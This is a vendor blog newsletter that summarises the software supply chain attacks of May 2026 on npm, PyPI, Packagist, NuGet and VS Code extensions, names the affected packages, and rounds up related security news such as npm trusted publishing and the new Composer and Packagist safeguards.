Blog/Events & community

Cloud Native Digest - May 2026

May 28 2026
18 min read
Written by
Nigel Douglas
Nigel Douglas
Head of Developer Relations - Cloudsmith

The Cloud-Native Digest is a monthly roundup on all things cloud native, artifact management, and supply chain security from Cloudsmith's Head of Developer Relations, Nigel Douglas.

Last month, we saw an unprecedented spike in software supply chain attacks across a variety of different open source software upstreams - such as 73 OpenVSX extensions linked to GlassWorm, TeamPCP attacks on SAP CAP npm packages, compromised TanStack npm packages, Intercom npm packages, PyTorch Lightning PyPI packages, as well as super high-profile malicious Checkmarx artifacts and a compromise of the Bitwarden CLI. There were too many supply chain attacks to count, in all honesty, so in this month’s change-up we’ve decided to provide a list of the most impactful supply chain incidents in chronological order (as well as the usual news roundup).

If you’re seeing a lot of malicious packages with a “MAL-” ID, similar to that of vulnerabilities with “CVE-” - but don’t know how to track these malicious software packages, check out my recent blog post for the OpenSSF.

Hope you enjoy it!

Supply Chain Security in the month of May

GlassWorm Malware Takedown

Date: 27th May

In a coordinated effort, CrowdStrike, Google, and the Shadowserver Foundation have simultaneously dismantled all C2 channels associated with GlassWorm, a highly resilient, likely Russia-based cybercrime campaign. Since early 2025, the group has targeted software developers by planting data-stealing malware, including JavaScript RATs inside malicious VS Code extensions, npm packages, and Python packages, ultimately poisoning over 300 GitHub repositories. To evade takedowns, GlassWorm utilised complex indirection layers across the Solana blockchain, BitTorrent DHT, Google Calendar, and commercial VPS infrastructure, highlighting the massive blast radius and persistent threat facing modern software supply chains.

Source: https://thehackernews.com/2026/05/glassworm-malware-takedown-disrupts.html


mouse5212-super-formatter - npm package

Date: 27th May

Cybersecurity researchers have discovered a malicious npm package (mouse5212-super-formatter) codenamed Malware-Slop designed to steal data from the directory used by Anthropic’s Claude AI tool. Masquerading as a legitimate deployment utility, the malware uses a GitHub access token during its postinstall stage to recursively upload victim files to a threat actor-controlled repository while hiding behind fake logs. Interestingly, the package leaked its own private GitHub token, suggesting the threat actor may have used AI to generate the malware without maintaining basic OPSEC, a trend that researchers expect to rise as AI lowers the barrier to entry for creating malware.

Source: https://thehackernews.com/2026/05/malicious-npm-package-stole-files-from.html

terminal3airport - npm packages

Date: 27th May

Throughout the month of May, a single npm account (terminal3airport) published 141 packages containing an identical payload: a web proxy unblocker built on the Scramjet framework. Disguised as tutoring websites, these packages function as adware, monetised via popunder ads and tracking scripts rather than relying on traditional install hooks or credential stealers. This campaign represents a case of npm registry abuse, essentially leveraging the registry as free, disposable CDN infrastructure for adware distribution.

Source: https://safedep.io/malicious-npm-terminal3airport-proxy-adware-spam

Forge-jsxy npm RAT

Date: 27th May

Published under a new maintainer account (jacksonkaandorp2), the forge-jsxy malicious npm package resumed the forge-jsx RAT campaign immediately after the original was removed. Spanning 22 versions (v1.0.66+) between May 4th and 26th the updated malware introduced advanced capabilities, including crypto-wallet scanning with BIP39 validation, browser extension database theft across over 21 browsers, WebRTC data channels, durable persistence, and auto-upgrades. Exfiltrated data continues to route to the original C2 server and attacker-controlled Hugging Face repositories.

OSV Advisory: Malicious npm package is tracked under MAL-2026-3609
Source: https://cyberpress.org/malicious-npm-rat-backdoor

TrapDoor PyPI & npm packages

Date: 24th May

34 malicious packages across 384 versions were used to steal crypto wallets, SSH keys, cloud credentials, and developer secrets from crypto, DeFi, Solana, and AI environments. The malware abused npm hooks, Python imports, and Rust build scripts for execution and persistence.

npm

PyPI

Blog: https://phoenix.security/trapdoor-supply-chain-ai-poisoning-npm-pypi-crates

Packagist PHP attacks

Date: 23rd May

A coordinated supply chain attack campaign has impacted eight packages on Packagist including malicious code designed to run a Linux binary retrieved from a GitHub Release URL. This cross-ecosystem placement makes the activity stand out because developers and security teams scanning PHP dependencies may only focus on Composer-related metadata, while skipping package.json lifecycle hooks that are bundled within the package.

Packagist

  • r2luna/brain (dev-main)
  • devdojo/wave (dev-main)
  • devdojo/genesis (dev-main)
  • katanaui/katana (dev-main)
  • baskarcm/tzi-chat-ui (dev-main)
  • elitedevsquad/sidecar-laravel (3.x-dev)
  • crosiersource/crosierlib-base (dev-master)
  • moritz-sauer-13/silverstripe-cms-theme (dev-master)

Source: https://thehackernews.com/2026/05/packagist-supply-chain-attack-infects-8.html

Polymarket - npm packages

Date: 21st May

A coordinated supply chain attack involved the rapid publication of 9 malicious npm packages by a throwaway account (polymarketdev) designed to impersonate legitimate Polymarket trading tools and AI coding assistants. Upon installation, a postinstall script detects if it is running in an interactive terminal to evade automated CI/CD security detection. In interactive sessions, the malware harvests any PRIVATE_KEY environment variables from local .env files without interaction and social engineers users into pasting their private keys via a fake, encrypted onboarding prompt. In reality, the unencrypted, plaintext Ethereum/Polygon private keys are immediately exfiltrated to an attacker-controlled Cloudflare Worker endpoint, while a persistent local directory (~/.polybot/) is created to fingerprint and track the victim's device across sessions.

npm

  1. polymarket-ai-agent (tracked under: MAL-2026-4209)
  2. polymarket-auto-trade (tracked under: MAL-2026-4210)
  3. polymarket-bot (tracked under: MAL-2026-4211)
  4. polymarket-claude-code (tracked under: MAL-2026-4212)
  5. polymarket-copy-trading (tracked under: MAL-2026-4213)
  6. polymarket-terminal (tracked under: MAL-2026-4214)
  7. polymarket-trade (tracked under: MAL-2026-4215)
  8. polymarket-trader (tracked under: MAL-2026-4216)
  9. polymarket-trading-cli (tracked under: MAL-2026-4217)

Source: https://safedep.io/malicious-polymarket-npm-crypto-wallet-drainer

Github incident - VS Code Extension

Date: 20th May

Github shared added details regarding their investigation into unauthorised access to GitHub's internal repositories.

On May 19th, Github detected and contained a compromise of an employee device involving a poisoned VS Code extension. They removed the malicious extension version, isolated the endpoint, and began incident response work immediately.

Status Update: https://x.com/github/status/2056949168208552080
OSM Detetcion: https://opensourcemalware.com/vscode/nrwl.angular-console

Mini Shai-Hulud - AntV npm packages

Date: 19th May

A compromised maintainer account led to various npm packages associated with the @antv ecosystem being injected with malware as part of the ongoing Mini Shai-Hulud attacks. This incident affects packages tied to the npm maintainer account atool, including echarts-for-react, a widely used React wrapper for Apache ECharts with roughly 1.1 million weekly downloads.

npm

Source: https://www.microsoft.com/en-us/security/blog/2026/05/20/mini-shai-hulud-compromised-antv-npm-packages-enable-ci-cd-credential-theft

Nx Console v18.95.0

Date: 19th May

A Malicious VS Code extension published to the Visual Studio Marketplace. The single-actor supply-chain compromise led to the brief publication of a malicious version of the Nx Console VSCode extension (v18.95.0) to the Visual Studio Marketplace and Open VSX registry. The incident stemmed from an upstream TanStack supply-chain breach seven days prior, which silently exfiltrated a core Nx contributor's GitHub CLI OAuth token and allowed the attacker to bypass unhardened pipeline controls. The extension contained a credential-stealing and persistence payload targeting developer environments; consequently, any users with auto-update enabled during the 39-minute exposure window had to immediately rotate all credentials.

Post-Mortem: https://nx.dev/blog/nx-console-v18-95-0-postmortem
GitHub Security Advisory: GHSA-c9j4-9m59-847w

Durabletask - 3 PyPI packages

Date: 18th May

Endor Labs discovered three trojanised versions (1.4.1, 1.4.2, and 1.4.3) of durabletask, the official Python SDK for Microsoft's Azure Durable Functions. The malicious code executes silently upon import on Linux systems, deploying a payload designed to steal credentials across major cloud and secrets platforms like AWS, Azure, GCP, and 1Password. Additionally, the malware targets systems located in Israel with a payload that attempts to wipe the filesystem. The affected versions have since been yanked from PyPI.

OSV Advisory: All three PyPI packages are tracked under MAL-2026-4174
Source: https://www.endorlabs.com/learn/trojanized-microsoft-sdk-durabletask-1-4-1-through-1-4-3-deliver-credential-stealing-malware

Megalodon

Date: 17th May

An automated supply chain attack codenamed megalodon used throwaway accounts and forged CI identities to push 5,718 malicious commits to 5,561 GitHub repositories within a six-hour window. By leveraging compromised credentials, the attackers injected malicious GitHub Actions workflows via a mass-scale variant (SysDiag) triggered by pushes/PRs, and a targeted variant (Optimize-Build) that hid behind manual API backdoors. Once executed on CI/CD runners, the payloads scraped and exfiltrated cloud credentials (AWS, GCP, Azure), SSH keys, environment variables, and source code secrets to a central C2 server. High-profile targets included Wiznet and Tiledesk, the latter of which unknowingly propagated the backdoor to the npm registry via routine package updates published directly from its compromised repository.

Source: https://safedep.io/megalodon-mass-github-repo-backdooring-ci-workflows

TanStack impacts OpenAI

Date: 15th May

Two employee devices at OpenAI were recently affected by the high-profile TanStack supply chain attack orchestrated by the cybercrime group TeamPCP, resulting in the limited exfiltration of internal source code credentials. While no user data or production systems were breached, the inclusion of compromised code-signing certificates forced OpenAI to rotate them, requiring macOS ChatGPT Desktop users to update their apps. This incident reflects a broader, ongoing campaign by TeamPCP, which has also impacted Mistral AI and numerous open-source packages. The attacks utilised resilient, multi-tiered malware designed to harvest widespread credentials and cloud infrastructure secrets.

Source: https://thehackernews.com/2026/05/tanstack-supply-chain-attack-hits-two.html

node-ipc - npm package

Date: 15th May

Malicious activity in newly published versions of node-ipc, a long-running npm package previously associated with one of the most widely discussed supply chain incidents in the JavaScript ecosystem.

The affected versions confirmed as malicious were:

  • node-ipc@9.1.6
  • node-ipc@9.2.3
  • node-ipc@12.0.1

OSV Advisory: All three npm packages are tracked under MAL-2026-3744
Source: https://snyk.io/blog/malicious-node-ipc-versions-published-npm

TeamPCP open-sources Shai-Hulud worm

Date: 13th May

TeamPCP, the group linked to the compromise of TanStack's npm packages, has teamed up with Breached forum to announce a supply chain attack competition with a $1,000 prize in Monero. As part of the announcement, the Shai-Hulud worm has been open-sourced and hosted on the forum's content delivery network. According to screenshots shared by Dark Web Informer on X, the competition rules require participants to use the worm in their attacks and submit proof that they have obtained access to a target's environment.

Status Update: https://x.com/DarkWebInformer/status/2054590267252940870

micresoft and superbase typosquatted npm packages

Date: 12th May

Five npm packages (impersonating libraries like Supabase, Microsoft Graph, and Apache Iceberg) were discovered carrying an identical, malicious 4.5 MB ELF binary disguised inside a .claude/ directory. The malware executes immediately upon npm install via a preinstall script, and persistently re-executes on every Claude Code session start by hijacking a project-level SessionStart hook. The statically linked, UPX-compressed binary targets standard credential harvesting list data, such as environment variables, home directory contents, and Git repository data.

Source: https://safedep.io/malicious-npm-packages-claude-code-hooks

Tanstack npm packages

Date: 11th May

84 npm packages were compromised as part of Mini Shai-Hulud campaign within the popular tanstack namespace, as well as additional packages across npm and PyPI including OpenSearch, Mistral AI, and Guardrails AI. Part of the ongoing Mini Shai-Hulud campaign, the attack utilised a chained GitHub Actions exploit (including cache poisoning and OIDC token extraction) to publish heavily obfuscated, credential-stealing malware targeting CI systems and developer workstations. Impacted organisations are advised to immediately rotate exposed secrets, audit repository histories, restrict GitHub Actions OIDC permissions, and verify dependency hashes to mitigate further risks.

npm

PyPI

Source: https://cloudsmith.com/blog/tanstack-npm-packages-compromised-in-mini-shai-hulud-attack

Checkmarx Jenkins AST plugin

Date: 9th May

Beginning March 23, 2026, Checkmarx suffered a supply chain cybersecurity incident after attackers used stolen credentials from a broader industry attack to gain unauthorised access to its GitHub repositories. Over several waves, the attackers exfiltrated data (which was later leaked on the dark web) as well as publishing malicious code to externally distributed artifacts, including VS Code extensions, GitHub Actions, and now a trojanised Jenkins plugin published to Jenkins Marketplace using credentials from the March Checkmarx breach.

Incident summary: https://checkmarx.com/blog/ongoing-security-updates
OSV Advisory: There are A LOT of malicious packages tracked from the recent Checkmarx breach

Date: 7th May

A highly downloaded, trending Hugging Face repository named Open-OSS/privacy-filter was removed after it was discovered typosquatting OpenAI's legitimate project to deliver malware. Backed by artificially inflated engagement from bot accounts, the repository contained a malicious loader.py file that executed a silent, multi-stage PowerShell attack chain on Windows machines. The final payload is a sophisticated, Rust-based credential infostealer designed to bypass security controls and exfiltrate browser data, Discord tokens, crypto wallets, and sensitive files to a command-and-control server. Because the malware fully compromises host credentials and session cookies, researchers strongly recommend that any affected users immediately reimage their systems and rotate all active passwords, tokens, and keys from a clean device.

Source: https://www.hiddenlayer.com/research/malware-found-in-trending-hugging-face-repository-open-oss-privacy-filter

bmrxntfj - NuGET libraries typosquatted

Date: 6th May

5 malicious NuGet packages were published by the account bmrxntfj. Targeting developers and CI/CD environments in Chinese enterprise .NET ecosystems, these packages impersonate popular open-source and internal infrastructure libraries (typosquatting AntdUI). When executed automatically during a nuget restore via a cross-platform .NET module initialiser, the packages use a .NET Reactor protected payload to hook into the CLR JIT compiler, evading static detection while actively rotating 224 package versions to invalidate file-hash IoCs.

NuGET

  • IR.DantUI
  • IR.Infrastructure.Core
  • IR.Infrastructure.DataService.Core
  • IR.iplus32
  • IR.OscarUI

Source: https://socket.dev/blog/5-malicious-nuget-packages-impersonate-chinese-ui-libraries

BufferZoneCorp - Ruby Gems and Go Modules

Date: 2nd May

The campaign orchestrated via the GitHub account BufferZoneCorp targeted developers, CI runners, and build environments across both the Ruby and Go ecosystems. The threat actors published sleeper packages under names mimicking legitimate developer tools (such as HashiCorp or Rails utilities), later updating them with malicious payloads that execute automatically upon installation or import. On the Ruby side, the packages automate the theft of sensitive local credentials and then exfiltrates them to a hidden endpoint. On the Go side, the modules utilised a distinct payload designed to tamper with GitHub Actions, poison GOPROXY settings, disabled checksum protections (GOSUMDB=off), modified workflow environments, and even plant unauthorised SSH public keys for persistent host access. While the Go Security team swiftly blocked the identified Go modules, the malicious Ruby gems and the source GitHub account remained live at the time of the report.

Ruby

Go

Source: https://socket.dev/blog/malicious-ruby-gems-and-go-modules-steal-secrets-poison-ci

intercom-php - mini Shai-Hulud in Packagist

Date: 1st May

The widely used PHP package intercom/intercom-php (specifically version 5.0.2) was recently compromised on Packagist as part of the ongoing Mini Shai-Hulud supply chain attack (it will come up a few times in this article), which primarily targets PyPI and npm upstream ecosystems. By exploiting Packagist's mutable version tags, attackers were able to convert the package into a malicious Composer plugin that automatically executes during installation and updates, meaning application code never actually needs to run to trigger the infection. Once activated, the malware downloads the Bun JavaScript runtime to execute an obfuscated payload (router_runtime.js) designed to steal cloud, DevOps, and CI/CD credentials (such as AWS, GitHub, and Kubernetes tokens), exfiltrate them securely, and actively propagate by injecting malicious code into other developer workflows and repositories.

Packagist

Source: https://cloudsmith.com/blog/mini-shai-hulud-reaches-packagist-the-intercom-intercom-php-compromise-explained

Additional Supply Chain Security News and Resources

CVE-2026-31635 - DirtyDecrypt PoC released
Source: 0xBlackash (Github)

Publicly-accessible proof of concept exploit code has been released for the DirtyDecrypt vulnerability, a recently patched local privilege escalation vulnerability in the Linux kernel that allows attackers to modify read-only file contents and gain root access. This vulnerability is part of a recent influx of similar no-COW memory-flaw variants, such as Copy Fail and Fragnesia, affecting distributions like Fedora, Arch Linux, and openSUSE. The rapid surge in these exploits has prompted Linux kernel developers to consider some kind of an emergency runtime killswitch to temporarily disable vulnerable functions, while distributions like Rocky Linux have introduced specialised security repositories to deploy urgent, pre-upstream patches.

An update on Composer & Packagist supply chain security
Source: Packagist Blog

In response to a recent surge in open-source supply chain attacks (specifically targeting PHP packages via compromised GitHub accounts) Composer and Packagist[.]org are rolling out a comprehensive security roadmap. Key immediate defenses include integrated Aikido malware detection, a public transparency log tracking tag modifications, and the launch of Composer 2.10, which introduces a unified dependency policy framework and strict stable version immutability to prevent attackers from retroactively backdooring existing tags. Moving forward, the ecosystem is transitioning toward mandatory MFA (with public MFA status on maintainer profiles), a minimum-release-age cooldown period, multi-user organisational package ownership, and a long-term shift toward hosting immutable build artifacts directly with SLSA and Sigstore provenance verification.

Announcing etcd 3.7.0-beta.0
Source: Kubernetes Blog

The etcd SIG team have announced the first beta release of etcd v3.7.0, a major update that improves security, reliability, and large resultset handling. A key feature is RangeStream, which is a new RPC developed to reduce latency and memory usage by streaming large query results in chunks. This release also achieves 100% v3store migration by completely removing legacy v2store components, which may have caused some breaking changes for older setups. Additionally, with the launch of this beta, etcd v3.4 has officially reached EOL status as of May 15th.

PaddleOCR 3.5: Running OCR and Document Parsing Tasks with a Transformers Backend
Source: Hugging Face

PaddleOCR 3.5 introduces a flexible inference-engine interface that integrates its OCR and document parsing capabilities (such as PP-OCRv5 and PaddleOCR-VL 1.5) directly into the Hugging Face ecosystem. By setting engine="transformers", you can now leverage Hugging Face Transformers as an inference backend with customisable backend options via the engine_config, ultimately reducing the integration friction for teams already using PyTorch-centered environments.

CISA enhances KEV Catalog to include new nomination form
Source: Cybersecurity and Infrastructure Security Agency

CISA has launched a new online Nomination Form allowing researchers, vendors, and industry partners to report actively exploited vulnerabilities (KEVs). Aligning with its existing disclosure programs, this initiative aims to accelerate the detection, validation, and sharing of critical threat information to protect federal, private, and critical infrastructure networks. While the new form streamlines public reporting, users can still submit KEV nominations via email.

3 actionable security upgrades to fix npm’s trust problem
Source: Nigel Douglas (me)

Securing the Node.js ecosystem requires moving away from historically permissive, trust-by-default toolchains toward an engineered fail-secure model. To mitigate the rapid supply chain attacks like malware injection and compromised updates we discussed already, devs should adopt these three actionable native CLI configurations to stay ahead of the next wave of supply chain attacks. The JavaScript ecosystem is also doing their best to secure the npm registry by introducing trusted publishing for npm packages.

Npm registry sets stage for more secure package publishing
Source: The Register

Trusted publishing in npm allows developers to publish packages directly from CI/CD workflows (such as GitHub Actions, GitLab CI/CD, and CircleCI) using existing OIDC authentication. By establishing a cryptographic trust relationship between npm and the CI/CD provider, this feature completely eliminates the need for risky, long-lived npm write tokens in favour of short-lived, single-use credentials. Built on an industry standard backed by the OpenSSF, it also automatically generates provenance attestations for public packages to guarantee code authenticity, significantly hardening the software supply chain against credential theft and unauthorised access.

The curl project outlines some of the pains of open source today
Source: Daniel Stenberg

Daniel Stenberg, the founder and lead developer of curl, reflects on his nearly 30-year journey of running the widely used open-source project as a grueling, 50+ hour-a-week labour of love. However, the project is currently facing an unprecedented crisis: a massive influx of high-quality, complex security reports has doubled since 2025, taking a heavy mental toll and threatening Stenberg with burnout. Despite the intense pressure and a record number of impending vulnerabilities, Stenberg emphasises that curl remains a highly scrutinised and iteratively improved project with mostly low-to-medium severity bugs.


Nvidia-verified agent skills
Source: Nvidia developer blog

Skills make your agent more capable, but can also introduce vulnerabilities. Nvidia’s verified skills give you transparency into what a skill does, where it came from, what risks it carries, and whether it's been modified. Every verified skill carries a skill card and is built on the agentskills.io open specification to work reliably across Claude Code, OpenAI Codex, and Cursor.

10 Years of SPIFFE
Source: joe[.]dev

Celebrating the 10th anniversary of SPIFFE (the now open-source standard for securing workload communication without passwords) creator Joe Beda reflects on how the concept of cryptographic identity is finally having its moment, driven by the modern rise of AI agents. To mark the milestone, Beda shared the original design documents and presentation slides, while also highlighting a fun design easter egg: the logo's signature colours were originally chosen because they match his last name in hex code (#00BEDA and #BEDA00).

PlatformCon 2026 - Don’t miss out!
Source: Cloudsmith

Whether or not you can make it to London or New York for the PlatformCon Live Days, I’ll also be delivering a series of virtual workshops during PlatformCon week. Join me to dive into AI security, malicious packages, policy-as-code, and more. If that sounds exciting, be sure to sign up for free today to reserve your spot!

    Read more by
    Nigel Douglas
    Nigel Douglas
    Head of Developer Relations - Cloudsmith
    Read more on
    newsletter

    More articles

    01/01